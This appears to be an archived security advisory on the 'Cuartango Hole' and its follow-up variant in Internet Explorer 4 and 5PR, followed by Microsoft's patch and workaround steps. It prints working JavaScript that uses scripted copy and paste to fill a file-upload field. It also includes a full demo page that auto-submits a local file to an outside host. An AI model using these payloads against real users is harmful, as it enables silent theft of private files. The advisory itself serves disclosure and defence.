COMMAND
IE
SYSTEMS AFFECTED
Win 9x, NT with IE 4.01 (w/ and w/o SP1) and 5PR
PROBLEM
Juan Carlos G. Cuartango of Spain has discovered an extremely
serious security hole in Internet Explorer 4. With a small amount
of JavaScript code on a Web page, a Web site operator can steal
any file from a user's hard disk and automatically uploaded the
contents to a Web server. More worrisome is that fact that the
security hole can be also exploited in an HTML-based Email message
in Outlook Express. Simply by reading a booby-trapped Email
message, private files can be stolen from one's hard disk. Most
computer users will consider this unacceptable product defect.
Details of the security hole were posted at Mr. Cuartango site:
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html
The Web site also contains a demo of the security problem. The
demo is based on a standard file uploader HTML form. Normally
only the user can manullay set the name of the file to uploaded
but IE4 inadvertently allows JavaScript to execute cut and paste
functions to set the file name. After the file name is set,
JavaScript auto-submits the form to upload the file.
Following was taken from site above. There is an input form field
used to tranfer files from the browsing computer to a WEB site
this input field is HTML coded as:
<input type="file" name="filename" size="30">
Theoretically this input field can be filled only by the user by
clicking a "Browse" button or typing the file name. In order to
avoid a security hole, script files are not allowed to modify the
value of this input field, the sentence bellow will not work (very
clever MS Explorer programmers):
document.forms[0].filename = "C:\config.sys";
What Microsoft programmers forgot is that "copy" and "paste"
commands are possible in scripting with Internet Explorer 4 and
they did not protect the file input field against this operation.
The attack is the evident:
1- Create a second form with a hidden field named "T1" containing
the file name you want to hack.
2- In the HTML Body Onload event fire an script:
<body onload="getfile()">
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
document.forms[0].submit();
}
The result is that the file is POSTED to the malicious WEB site
defined in the form action property. There is a second security
issue: The content of your clipboard can be sent to a malicious
WEB just performing a "paste" command over an input text box. The
source code of demo page looks like this:
<html>
<script language="JavaScript">
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
document.execCommand("paste");
window.open("cuartangoh3.html");
document.forms[0].submit();
}
</script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Cuartango Hole 2</title>
</head>
<body onload="getfile()">
<form enctype="multipart/form-data" method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"
value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am
transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my
web site </strong> </p>
</form>
<form method="POST">
<input type="hidden" name="T1" value="/test.txt"><p> </p>
</form>
<p align="center">Transfer # <img src="/cgi-bin/Count.cgi" width="97" height="24"></p>
</body>
</html>
The bug is reported to be present in the preview version of IE5,
and IE 4.x (but not first release). There is also a program
called TegoSoft WebExpress who does the same thing by using
ActiveX and runs the file.
After a while, same person found similar bug that avoided
protection by initial MS fix. This vulnerability has been called
The Son of Cuartango Hole. This is a problem closely related with
the Cuartango Hole issue. Microsoft called it the "Untrusted
Scripted Paste (USP)" and published a FIX that unfortunately did
not fix completely the problem. There is an input form field used
to tranfer files from the browsing computer to a WEB site this
input field is HTML coded as:
<input type="file" name="filename" size="30">
Theoretically this input field can be filled only by the user by
clicking a "Browse" button or typing the file name. In order to
avoid a security hole, script files are not allowed to modify the
value of this input field, the sentence bellow will not work:
document.forms[0].filename = "C:\config.sys";
The Cuartango Hole revealed that a single scripted "copy and
paste" operation could write a file name on the input field,
Microsoft's old USP patch fixed this single "copy and paste"
vulnerability. There is a workaround making the "paste" operation
work again. The idea is: create a "textrange" object with the
selection of the file input and then paste over this "textrange"
object. The code below is a bit more sophisticated than the
"Cuartango Hole" code: T1 is a hidden input field defined in a
second form containing the file pathname to be copied to the
clipboard.
<body onload="getfile()">
function getfile()
{
document.forms[1].T1.select();
document.execCommand("copy");
document.forms[0].filename.select();
var rng = document.selection.createRange();
rng.execCommand("paste");
document.forms[0].submit();
}
The result is that the file is POSTED to the malicious WEB site
defined in the form action property. A similar code will also
work inside an HTML formatted e-mail. Your computer files can be
sent to a WEB site by a malicious Script (if the file name is
known). The malicious script can be executed from a WEB page or
from an HTML received e-mail.
SOLUTION
On November 18th Microsoft released an updated version of the
patch for the "Untrusted Scripted Paste" vulnerability. The
updated patch fixes the original vulnerability as well as a
newly-discovered variant.
Windows 98
==========
Windows 98 customers can obtain the updated patch using Windows
Update. To obtain this patch using Windows Update, launch
Windows Update from the Windows Start Menu and click "Product
Updates." When prompted, select 'Yes' to allow Windows Update
to determine whether this patch and other updates are needed by
your computer. If your computer does need this patch, you will
find it listed under the "Critical Updates" section of the page.
Internet Explorer 4.01
======================
Customers using Internet Explorer 4.01 can obtain the patch from
the Internet Explorer Security web site:
http://www.microsoft.com/ie/security/paste.htm
Administrative Workaround
=========================
If the user has disabled the default warning that is displayed
when submitting unencrypted forms, re-enabling this feature can
provide additional protection. The warning prompt makes sure
users are alerted if a script attempts to submit data using
forms. Users should be cautious if they see this warning when
browsing and have not actually chosen to submit any data. To
turn on this prompt:
1. From Internet Explorer, choose "Internet Options" from the
"View" menu.
2. Click on the tab labeled "Security".
3. Click on "Internet Zone", then click "Customize Settings".
4. Scroll to "Submit non-encrypted form data" and click on
"Prompt".
The same procedure should be followed for the "Restricted Sites"
Zone. Additionally, users who cannot apply the patch immediately
can disable Active Scripting technologies in Internet Explorer to
protect themselves from this issue. Please note that the Zones
security feature in Internet Explorer 4 can be used to disable
Active Scripting (VBScript and JScript) in untrusted or unknown
Internet sites, while still permitting it in trusted and known
sites.